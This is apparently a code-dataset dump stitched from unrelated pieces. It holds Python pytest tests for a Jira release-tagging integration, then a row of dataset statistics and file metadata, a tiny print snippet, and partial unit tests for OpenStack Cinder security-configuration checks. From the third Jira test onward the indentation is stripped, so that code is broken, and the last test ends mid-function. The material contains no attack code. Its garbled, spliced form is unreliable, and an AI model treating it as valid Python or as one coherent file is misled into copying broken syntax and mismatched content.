    parser.set('jira', 'url', 'http://happy.happy.joy.joy')
    _b.settings = parser
    with patch('requests.get') as mock_get_request, patch('requests.post') as mock_post_request, patch('requests.put') as mock_put_request:
        # Expected auth header: HTTP Basic over base64("user:token").
        basic_auth = base64.b64encode("{0}:{1}".format('flow_tester@homedepot.com', 'fake_token').encode('ascii')).decode('ascii')
        headers = {'Content-type': 'application/json', 'Accept': 'application/json', 'Authorization': 'Basic {0}'.format(basic_auth)}
        timeout = 30
        # NOTE(review): `project` is unused here -- no version should be
        # created in this scenario.
        project = {
            "projectId": "123456",
            "name": "testproject-v0.1"
        }
        # Expected PUT body adding the existing fix version to a story.
        version = {
            "update": {
                "fixVersions": [
                    {
                        "add": {
                            "name": "testproject-v0.1"
                        }
                    }
                ]
            }
        }
        # Constructor resolves the project key; subsequent GETs list the
        # existing versions (testproject-v0.1 is already among them).
        mock_get_request.side_effect = mock_get_multiple_project_ids_response
        _jira = Jira(config_override=_b)
        mock_get_request.side_effect = mock_get_project_versions
        mock_post_request.return_value.text = ''
        mock_post_request.return_value.status_code = 201
        mock_put_request.return_value.text = ''
        mock_put_request.return_value.status_code = 204
        mock_get_calls = [
            call('http://happy.happy.joy.joy/rest/api/3/project/TEST',
                 headers=headers, timeout=timeout),
            call('http://happy.happy.joy.joy/rest/api/3/project/123456/versions',
                 headers=headers, timeout=timeout)
        ]
        _jira.tag_stories_in_commit(story_list=['TEST-123', 'TEST-456'])
        mock_get_request.assert_has_calls(mock_get_calls)
        # The version exists already, so no creation POST is allowed.
        mock_post_request.assert_not_called()
        mock_put_request.assert_any_call('http://happy.happy.joy.joy/rest/api/3/issue/TEST-123',
                                         ANY, headers=headers, timeout=timeout)
        mock_put_request.assert_any_call('http://happy.happy.joy.joy/rest/api/3/issue/TEST-456',
                                         ANY, headers=headers, timeout=timeout)
        mock_put_request_calls = mock_put_request.call_args_list
        # Every PUT must carry the same fixVersions update body.
        for i, put_call in enumerate(mock_put_request_calls):
            call_args, call_kwargs = put_call
            put_data_arg = call_args[1]
            assert version == json.loads(put_data_arg)
def test_tag_stories_in_commit_for_multiple_projects(monkeypatch):
    """With two configured projects and a new version (v1.1),
    tag_stories_in_commit should create the version on BOTH projects and
    PUT it onto each story in its own project.
    """
    # Credentials the Jira client reads from the environment.
    monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
    monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
    _b = MagicMock(BuildConfig)
    _b.build_env_info = mock_build_config_dict_multi_projects['environments']['unittest']
    _b.project_name = mock_build_config_dict_multi_projects['projectInfo']['name']
    _b.version_number = 'v1.1'
    _b.json_config = mock_build_config_dict_multi_projects
    # settings.ini equivalent pointing at a fake Jira base URL.
    parser = configparser.ConfigParser()
    parser.add_section('jira')
    parser.set('jira', 'url', 'http://happy.happy.joy.joy')
    _b.settings = parser
    with patch('requests.get') as mock_get_request, patch('requests.post') as mock_post_request, patch('requests.put') as mock_put_request:
        # Expected auth header: HTTP Basic over base64("user:token").
        basic_auth = base64.b64encode("{0}:{1}".format('flow_tester@homedepot.com', 'fake_token').encode('ascii')).decode('ascii')
        headers = {'Content-type': 'application/json', 'Accept': 'application/json', 'Authorization': 'Basic {0}'.format(basic_auth)}
        timeout = 30
        # Expected POST bodies: one version per project.
        project = {
            "projectId": "123456",
            "name": "testproject-v1.1"
        }
        project2 = {
            "projectId": "1234567",
            "name": "testproject-v1.1"
        }
        # Expected PUT body adding the fix version to a story.
        version = {
            "update": {
                "fixVersions": [
                    {
                        "add": {
                            "name": "testproject-v1.1"
                        }
                    }
                ]
            }
        }
        # Constructor resolves both project keys; subsequent GETs list
        # each project's existing versions (v1.1 is in neither).
        mock_get_request.side_effect = mock_get_multiple_project_ids_response
        _jira = Jira(config_override=_b)
        mock_get_request.side_effect = mock_get_project_versions
        mock_post_request.return_value.text = ''
        mock_post_request.return_value.status_code = 201
        mock_put_request.return_value.text = ''
        mock_put_request.return_value.status_code = 204
        # PUT responses vary per story URL (204 for the story that
        # belongs to the project, 404 otherwise).
        mock_put_request.side_effect = mock_get_multiple_project_labels_response
        mock_get_calls = [
            call('http://happy.happy.joy.joy/rest/api/3/project/TEST',
                 headers=headers, timeout=timeout),
            call('http://happy.happy.joy.joy/rest/api/3/project/TEST2',
                 headers=headers, timeout=timeout),
            call('http://happy.happy.joy.joy/rest/api/3/project/123456/versions',
                 headers=headers, timeout=timeout),
            call('http://happy.happy.joy.joy/rest/api/3/project/1234567/versions',
                 headers=headers, timeout=timeout)
        ]
        mock_post_calls = [
            call('http://happy.happy.joy.joy/rest/api/3/version',
                 ANY, headers=headers, timeout=timeout),
            call('http://happy.happy.joy.joy/rest/api/3/version',
                 ANY, headers=headers, timeout=timeout)
        ]
        mock_put_calls = [
            call('http://happy.happy.joy.joy/rest/api/3/issue/TEST-123',
                 ANY, headers=headers, timeout=timeout),
            call('http://happy.happy.joy.joy/rest/api/3/issue/TEST2-456',
                 ANY, headers=headers, timeout=timeout)
        ]
        _jira.tag_stories_in_commit(story_list=['TEST-123', 'TEST2-456'])
        mock_get_request.assert_has_calls(mock_get_calls, any_order=True)
        mock_post_request.assert_has_calls(mock_post_calls)
        # First POST targets project 123456, second targets 1234567.
        mock_post_request_calls = mock_post_request.call_args_list
        call_args, call_kwargs = mock_post_request_calls[0]
        post_data_arg = call_args[1]
        assert project == json.loads(post_data_arg)
        call_args2, call_kwargs2 = mock_post_request_calls[1]
        post_data_arg2 = call_args2[1]
        assert project2 == json.loads(post_data_arg2)
        mock_put_request.assert_has_calls(mock_put_calls)
        mock_put_request_calls = mock_put_request.call_args_list
        # Every PUT must carry the same fixVersions update body.
        for i, put_call in enumerate(mock_put_request_calls):
            call_args, call_kwargs = put_call
            put_data_arg = call_args[1]
            assert version == json.loads(put_data_arg)
def test_tag_stories_in_commit_for_multiple_projects_when_version_exists_on_one_project(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict_multi_projects['environments']['unittest']
_b.project_name = mock_build_config_dict_multi_projects['projectInfo']['name']
_b.version_number = 'v1.0'
_b.json_config = mock_build_config_dict_multi_projects
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
with patch('requests.get') as mock_get_request, patch('requests.post') as mock_post_request, patch('requests.put') as mock_put_request:
basic_auth = base64.b64encode("{0}:{1}".format('flow_tester@homedepot.com', 'fake_token').encode('ascii')).decode('ascii')
headers = {'Content-type': 'application/json', 'Accept': 'application/json', 'Authorization': 'Basic {0}'.format(basic_auth)}
timeout = 30
project = {
"projectId" : "123456",
"name": "testproject-v1.0"
}
project2 = {
"projectId" : "1234567",
"name": "testproject-v1.0"
}
version = {
"update": {
"fixVersions": [
{
"add": {
"name": "testproject-v1.0"
}
}
]
}
}
mock_get_request.side_effect = mock_get_multiple_project_ids_response
_jira = Jira(config_override=_b)
mock_get_request.side_effect = mock_get_project_versions
mock_post_request.return_value.text = ''
mock_post_request.return_value.status_code = 201
mock_put_request.return_value.text = ''
mock_put_request.return_value.status_code = 204
mock_put_request.side_effect = mock_get_multiple_project_labels_response
mock_get_calls = [
call('http://happy.happy.joy.joy/rest/api/3/project/TEST',
headers=headers, timeout=timeout),
call('http://happy.happy.joy.joy/rest/api/3/project/TEST2',
headers=headers, timeout=timeout),
call('http://happy.happy.joy.joy/rest/api/3/project/123456/versions',
headers=headers, timeout=timeout),
call('http://happy.happy.joy.joy/rest/api/3/project/1234567/versions',
headers=headers, timeout=timeout)
]
mock_post_calls = [
call('http://happy.happy.joy.joy/rest/api/3/version',
ANY, headers=headers, timeout=timeout)
]
mock_put_calls = [
call('http://happy.happy.joy.joy/rest/api/3/issue/TEST-123',
ANY, headers=headers, timeout=timeout),
call('http://happy.happy.joy.joy/rest/api/3/issue/TEST2-456',
ANY, headers=headers, timeout=timeout)
]
_jira.tag_stories_in_commit(story_list=['TEST-123', 'TEST2-456'])
mock_get_request.assert_has_calls(mock_get_calls, any_order=True)
mock_post_request.assert_has_calls(mock_post_calls)
assert mock_post_request.call_count == 1
mock_post_request_calls = mock_post_request.call_args_list
call_args, call_kwargs = mock_post_request_calls[0]
post_data_arg = call_args[1]
assert project == json.loads(post_data_arg)
mock_put_request.assert_has_calls(mock_put_calls)
mock_put_request_calls = mock_put_request.call_args_list
for i, put_call in enumerate(mock_put_request_calls):
call_args, call_kwargs = put_call
put_data_arg = call_args[1]
assert version == json.loads(put_data_arg)
def test_story_bump_bug(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict['environments']['unittest']
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
with patch('requests.get') as mock_request:
mock_request.side_effect = mock_get_multiple_project_ids_response
_jira = Jira(config_override=_b)
current_test_directory = os.path.dirname(os.path.realpath(__file__))
with open(current_test_directory + "/jira_stories_bug.json", 'r') as myfile:
jira_json_data = json.loads(myfile.read())
bump_type = _jira.determine_semantic_version_bump(story_details=jira_json_data["stories"])
assert bump_type == "bug"
def test_story_bump_minor(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict['environments']['unittest']
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
with patch('requests.get') as mock_request:
mock_request.side_effect = mock_get_multiple_project_ids_response
_jira = Jira(config_override=_b)
current_test_directory = os.path.dirname(os.path.realpath(__file__))
with open(current_test_directory + "/jira_stories_minor.json", 'r') as myfile:
jira_json_data = json.loads(myfile.read())
bump_type = _jira.determine_semantic_version_bump(story_details=jira_json_data["stories"])
assert bump_type == "minor"
def test_story_bump_major(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict['environments']['unittest']
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
with patch('requests.get') as mock_request:
mock_request.side_effect = mock_get_multiple_project_ids_response
_jira = Jira(config_override=_b)
current_test_directory = os.path.dirname(os.path.realpath(__file__))
with open(current_test_directory + "/jira_stories_major.json", 'r') as myfile:
jira_json_data = json.loads(myfile.read())
bump_type = _jira.determine_semantic_version_bump(story_details=jira_json_data["stories"])
assert bump_type == "major"
def test_init_for_multiple_projects_too_many_project_id_keys(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict_both_project_ids['environments']['unittest']
_b.json_config = mock_build_config_dict_both_project_ids
with patch('flow.utils.commons.print_msg') as mock_printmsg_fn:
with pytest.raises(SystemExit):
Jira(config_override=_b)
mock_printmsg_fn.assert_called_with('Jira', '__init__',
"The build config may only contain 'projectKey' for single project key"
" or 'projectKeys' containing an array of project keys", 'ERROR')
def test_init_missing_jira(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.json_config = mock_build_config_missing_jira_dict
with patch('flow.utils.commons.print_msg') as mock_printmsg_fn:
with pytest.raises(SystemExit):
Jira(config_override=_b)
mock_printmsg_fn.assert_called_with('Jira', '__init__',
"The build config associated with projectTracking is "
"missing key 'projectTracking'", 'ERROR')
def test_init_missing_jira_project_key(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.json_config = mock_build_config_missing_project_id_dict
with patch('flow.utils.commons.print_msg') as mock_printmsg_fn:
with pytest.raises(SystemExit):
Jira(config_override=_b)
mock_printmsg_fn.assert_called_with('Jira', '__init__',
"The build config associated with projectTracking is missing key "
"'projectKey'",
'ERROR')
def test_init_missing_jira_url(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
_b.settings = parser
with patch('flow.utils.commons.print_msg') as mock_printmsg_fn:
with pytest.raises(SystemExit):
Jira(config_override=_b)
mock_printmsg_fn.assert_called_with('Jira', '__init__',
'No jira url found in buildConfig or settings.ini.', 'ERROR')
def test_init_missing_jira_url_but_contains_jira_in_config_parser(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
parser.add_section('jira')
_b.settings = parser
with patch('flow.utils.commons.print_msg') as mock_printmsg_fn:
with pytest.raises(SystemExit):
Jira(config_override=_b)
mock_printmsg_fn.assert_called_with('Jira', '__init__',
'No jira url found in buildConfig or settings.ini.', 'ERROR')
def test_init_missing_all_env_variable(monkeypatch):
if os.getenv('JIRA_USER'):
monkeypatch.delenv('JIRA_USER')
if os.getenv('JIRA_TOKEN'):
monkeypatch.delenv('JIRA_TOKEN')
with patch('flow.utils.commons.print_msg') as mock_printmsg_fn:
with pytest.raises(SystemExit):
Jira()
mock_printmsg_fn.assert_called_with('Jira', '__init__',
"No jira user, jira token found in environment. Did you define environment variables 'JIRA_USER' and 'JIRA_TOKEN'?",
'ERROR')
def test_init_missing_user_env_variable(monkeypatch):
if os.getenv('JIRA_USER'):
monkeypatch.delenv('JIRA_USER')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
with patch('flow.utils.commons.print_msg') as mock_printmsg_fn:
with pytest.raises(SystemExit):
Jira()
mock_printmsg_fn.assert_called_with('Jira', '__init__',
"No jira user found in environment. Did you define environment variable 'JIRA_USER'?",
'ERROR')
def test_init_missing_token_env_variable(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
if os.getenv('JIRA_TOKEN'):
monkeypatch.delenv('JIRA_TOKEN')
with patch('flow.utils.commons.print_msg') as mock_printmsg_fn:
with pytest.raises(SystemExit):
Jira()
mock_printmsg_fn.assert_called_with('Jira', '__init__',
"No jira token found in environment. Did you define environment variable 'JIRA_TOKEN'?",
'ERROR')
def test_extract_story_id_with_empty_list(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict['environments']['unittest']
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
with patch('requests.get') as mock_request:
mock_request.side_effect = mock_get_multiple_project_ids_response
_jira = Jira(config_override=_b)
story_list = _jira.extract_story_id_from_commit_messages([])
assert len(story_list) == 0
commit_example = [
"223342f Adding ability to specify artifactory user [TEST-100]",
"4326d00 Adding slack channel option for errors [TEST-102]",
"09c1983 Merge pull request #25 from ci-cd/revert-18-github-version-fix",
"445fd02 Revert \"GitHub version fix\""
]
def test_extract_story_id_with_two_stories(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict['environments']['unittest']
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
with patch('requests.get') as mock_request:
mock_request.side_effect = mock_get_multiple_project_ids_response
_jira = Jira(config_override=_b)
story_list = _jira.extract_story_id_from_commit_messages(commit_example)
assert len(story_list) == 2
commit_example_nested_brackets = [
"223342f Adding ability to specify artifactory user [TEST-101, [bubba]]",
"4326d00 Adding slack channel option for errors [TEST-201]",
"09c1983 Merge pull request #25 from ci-cd/revert-18-github-version-fix",
"445fd02 Revert \"GitHub version fix\""
]
def test_extract_story_id_with_nested_brackets(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict['environments']['unittest']
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
with patch('requests.get') as mock_request:
mock_request.side_effect = mock_get_multiple_project_ids_response
_jira = Jira(config_override=_b)
story_list = _jira.extract_story_id_from_commit_messages(commit_example_nested_brackets)
print(str(story_list))
assert len(story_list) == 1
commit_example_multiple_per_brackets = [
"223342f Adding ability to specify artifactory user [TEST-100,TEST-101]",
"4326d00 Adding slack channel option for errors [TEST-98,TEST-99]",
"09c1983 Merge pull request #25 from ci-cd/revert-18-github-version-fix",
"445fd02 Revert \"GitHub version fix\""
]
def test_extract_story_id_with_multiple_per_brackets(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict['environments']['unittest']
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
with patch('requests.get') as mock_request:
mock_request.side_effect = mock_get_multiple_project_ids_response
_jira = Jira(config_override=_b)
story_list = _jira.extract_story_id_from_commit_messages(commit_example_multiple_per_brackets)
print(str(story_list))
assert len(story_list) == 4
commit_example_dedup = [
"223342f Adding ability to specify artifactory user [TEST-100,TEST-100]",
"4326d00 Adding slack channel option for errors [TEST-100,TEST-100]",
"09c1983 Merge pull request #25 from ci-cd/revert-18-github-version-fix",
"445fd02 Revert \"GitHub version fix\""
]
def test_extract_story_id_with_dedup(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict['environments']['unittest']
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
with patch('requests.get') as mock_request:
mock_request.side_effect = mock_get_multiple_project_ids_response
_jira = Jira(config_override=_b)
story_list = _jira.extract_story_id_from_commit_messages(commit_example_dedup)
print(str(story_list))
assert len(story_list) == 1
def test_flatten_story_details_with_None_story_details(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict['environments']['unittest']
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
with patch('requests.get') as mock_request:
mock_request.side_effect = mock_get_multiple_project_ids_response
_jira = Jira(config_override=_b)
flat_story_details = _jira.flatten_story_details(None)
assert flat_story_details is None
def test_flatten_story_details_with_empty_story_details(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict['environments']['unittest']
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
with patch('requests.get') as mock_request:
mock_request.side_effect = mock_get_multiple_project_ids_response
_jira = Jira(config_override=_b)
flat_story_details = _jira.flatten_story_details([])
assert len(flat_story_details) == 0
def test_flatten_story_details_with_story_details(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict['environments']['unittest']
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
flat_story_expected = [
{
"story_type" : "bug",
"id" : "TEST-123",
"name" : "Test Bug",
"url" : "http://happy.happy.joy.joy/browse/TEST-123",
"current_state" : "In Progress",
"description" : "This is a test bug description"
},
{
"story_type" : "bug",
"id" : "TEST-456",
"name" : "Another test Bug",
"url" : "http://happy.happy.joy.joy/browse/TEST-456",
"current_state" : "Code Review",
"description" : "Another test bug"
}
]
with patch('requests.get') as mock_request:
mock_request.side_effect = mock_get_multiple_project_ids_response
_jira = Jira(config_override=_b)
current_test_directory = os.path.dirname(os.path.realpath(__file__))
with open(current_test_directory + "/jira_stories_bug.json", 'r') as myfile:
jira_data = myfile.read()
story_details = json.loads(jira_data).get('stories')
flat_story_details = _jira.flatten_story_details(story_details)
assert flat_story_expected == flat_story_details
for story in flat_story_details:
assert 'story_type' in story
assert 'id' in story
assert 'name' in story
assert 'description' in story
assert 'url' in story
assert 'current_state' in story
| 41.831963 | 161 | 0.636249 | 5,499 | 45,806 | 4.967994 | 0.052737 | 0.025696 | 0.039972 | 0.048538 | 0.940701 | 0.93349 | 0.917676 | 0.898203 | 0.892456 | 0.874154 | 0 | 0.023254 | 0.24237 | 45,806 | 1,094 | 162 | 41.870201 | 0.763947 | 0.000786 | 0 | 0.735169 | 0 | 0.034958 | 0.238398 | 0.028251 | 0 | 0 | 0 | 0 | 0.060381 | 1 | 0.03178 | false | 0 | 0.012712 | 0 | 0.048729 | 0.022246 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0650e3b9b523e8bb9247abbb1e05cf43d48f8694 | 31 | py | Python | 23_pr5_03.py | AmreshTripathy/Python | e86420fef7f52da393be5b50ac2f13bddfeb3306 | [
"Apache-2.0"
] | 4 | 2021-05-27T05:06:09.000Z | 2021-06-12T17:12:47.000Z | 23_pr5_03.py | AmreshTripathy/Python | e86420fef7f52da393be5b50ac2f13bddfeb3306 | [
"Apache-2.0"
] | null | null | null | 23_pr5_03.py | AmreshTripathy/Python | e86420fef7f52da393be5b50ac2f13bddfeb3306 | [
"Apache-2.0"
] | null | null | null | a = {18, '18', 18.1}
print (a) | 15.5 | 21 | 0.451613 | 7 | 31 | 2 | 0.571429 | 0.571429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.291667 | 0.225806 | 31 | 2 | 22 | 15.5 | 0.291667 | 0 | 0 | 0 | 0 | 0 | 0.064516 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
06aa57cf46f7a78ca69e19d1339c2b74f8ad3506 | 8,256 | py | Python | tests/test_cinder.py | fallenpegasus/reconbf | bfd15bef549f011a3de885c3267d4f718223b798 | [
"Apache-2.0"
] | 45 | 2016-08-12T21:37:25.000Z | 2022-03-29T00:21:29.000Z | tests/test_cinder.py | fallenpegasus/reconbf | bfd15bef549f011a3de885c3267d4f718223b798 | [
"Apache-2.0"
] | 20 | 2016-08-11T07:42:28.000Z | 2016-09-09T13:33:47.000Z | tests/test_cinder.py | fallenpegasus/reconbf | bfd15bef549f011a3de885c3267d4f718223b798 | [
"Apache-2.0"
] | 6 | 2016-08-25T06:31:38.000Z | 2019-09-11T04:29:36.000Z | from reconbf.modules import test_cinder
from reconbf.lib.result import Result, TestResult
from reconbf.lib import utils
import pwd
import grp
import unittest
from mock import patch
class ConfigPermissions(unittest.TestCase):
conf = {'dir': '', 'user': '', 'group': ''}
pwd_root = pwd.struct_passwd(('root', 'x', 0, 0, 'root', '/root',
'/bin/bash'))
grp_root = grp.struct_group(('root', 'x', 0, []))
def test_no_user(self):
with patch.object(pwd, 'getpwnam', side_effect=KeyError()):
with patch.object(grp, 'getgrnam', return_value=self.grp_root):
res = test_cinder.config_permission(self.conf)
self.assertEqual(res.result, Result.SKIP)
def test_no_group(self):
with patch.object(pwd, 'getpwnam', return_value=self.pwd_root):
with patch.object(grp, 'getgrnam', side_effect=KeyError()):
res = test_cinder.config_permission(self.conf)
self.assertEqual(res.result, Result.SKIP)
def test_good_perm(self):
with patch.object(pwd, 'getpwnam', return_value=self.pwd_root):
with patch.object(grp, 'getgrnam', return_value=self.grp_root):
with patch.object(utils, 'validate_permissions',
return_value=TestResult(Result.PASS)):
res = test_cinder.config_permission(self.conf)
self.assertEqual(res.result, Result.PASS)
def test_bad_perm(self):
with patch.object(pwd, 'getpwnam', return_value=self.pwd_root):
with patch.object(grp, 'getgrnam', return_value=self.grp_root):
with patch.object(utils, 'validate_permissions',
return_value=TestResult(Result.FAIL)):
res = test_cinder.config_permission(self.conf)
self.assertEqual(res.result, Result.FAIL)
class CinderAuth(unittest.TestCase):
conf = {'dir': ''}
def test_no_config(self):
with patch.object(utils, 'parse_openstack_ini',
side_effect=EnvironmentError()):
res = test_cinder.cinder_auth(self.conf)
self.assertEqual(res.result, Result.SKIP)
def _run_with_config(self, os_ini):
with patch.object(utils, 'parse_openstack_ini', return_value=os_ini):
return test_cinder.cinder_auth(self.conf)
def test_keystone(self):
res = self._run_with_config({'DEFAULT': {'auth_strategy': 'keystone'}})
self.assertEqual(res.result, Result.PASS)
def test_other(self):
res = self._run_with_config({'DEFAULT': {'auth_strategy': 'other'}})
self.assertEqual(res.result, Result.FAIL)
class KeystoneSecure(unittest.TestCase):
conf = {'dir': ''}
def test_no_config(self):
with patch.object(utils, 'parse_openstack_ini',
side_effect=EnvironmentError()):
res = test_cinder.keystone_secure(self.conf)
self.assertEqual(res.result, Result.SKIP)
def _run_with_config(self, os_ini):
with patch.object(utils, 'parse_openstack_ini', return_value=os_ini):
res = test_cinder.keystone_secure(self.conf)
return res
def test_bad_proto(self):
res = self._run_with_config({'keystone_authtoken': {
'auth_protocol': 'http',
'identity_uri': 'https://abc'}})
self.assertEqual(res.result, Result.FAIL)
def test_bad_uri(self):
res = self._run_with_config({'keystone_authtoken': {
'auth_protocol': 'https',
'identity_uri': 'http://abc'}})
self.assertEqual(res.result, Result.FAIL)
def test_ok(self):
res = self._run_with_config({'keystone_authtoken': {
'auth_protocol': 'https',
'identity_uri': 'https://abc'}})
self.assertEqual(res.result, Result.PASS)
class NovaSecure(unittest.TestCase):
conf = {'dir': ''}
def test_no_config(self):
with patch.object(utils, 'parse_openstack_ini',
side_effect=EnvironmentError()):
res = test_cinder.nova_secure(self.conf)
self.assertEqual(res.result, Result.SKIP)
def _run_with_config(self, os_ini):
with patch.object(utils, 'parse_openstack_ini', return_value=os_ini):
res = test_cinder.nova_secure(self.conf)
return res
def test_bad(self):
res = self._run_with_config({'DEFAULT': {
'nova_api_insecure': 'true'}})
self.assertEqual(res.result, Result.FAIL)
def test_ok(self):
res = self._run_with_config({'DEFAULT': {
'nova_api_insecure': 'false'}})
self.assertEqual(res.result, Result.PASS)
class GlanceSecure(unittest.TestCase):
conf = {'dir': ''}
def test_no_config(self):
with patch.object(utils, 'parse_openstack_ini',
side_effect=EnvironmentError()):
res = test_cinder.glance_secure(self.conf)
self.assertEqual(res.result, Result.SKIP)
def _run_with_config(self, os_ini):
with patch.object(utils, 'parse_openstack_ini', return_value=os_ini):
res = test_cinder.glance_secure(self.conf)
return res
def test_bad(self):
res = self._run_with_config({'DEFAULT': {
'glance_api_insecure': 'true'}})
self.assertEqual(res.result, Result.FAIL)
def test_ok(self):
res = self._run_with_config({'DEFAULT': {
'glance_api_insecure': 'false'}})
self.assertEqual(res.result, Result.PASS)
class NasSecurity(unittest.TestCase):
conf = {'dir': ''}
def test_no_config(self):
with patch.object(utils, 'parse_openstack_ini',
side_effect=EnvironmentError()):
res = test_cinder.nas_security(self.conf)
self.assertEqual(res.result, Result.SKIP)
def _run_with_config(self, os_ini):
with patch.object(utils, 'parse_openstack_ini', return_value=os_ini):
res = test_cinder.nas_security(self.conf)
return res
def test_bad_ops(self):
res = self._run_with_config({'DEFAULT': {
'nas_secure_file_operations': 'false',
'nas_secure_file_permissions': 'auto'}})
self.assertEqual(res.result, Result.FAIL)
def test_bad_perm(self):
res = self._run_with_config({'DEFAULT': {
'nas_secure_file_operations': 'auto',
'nas_secure_file_permissions': 'false'}})
self.assertEqual(res.result, Result.FAIL)
def test_ok(self):
res = self._run_with_config({'DEFAULT': {
'nas_secure_file_operations': 'auto',
'nas_secure_file_permissions': 'auto'}})
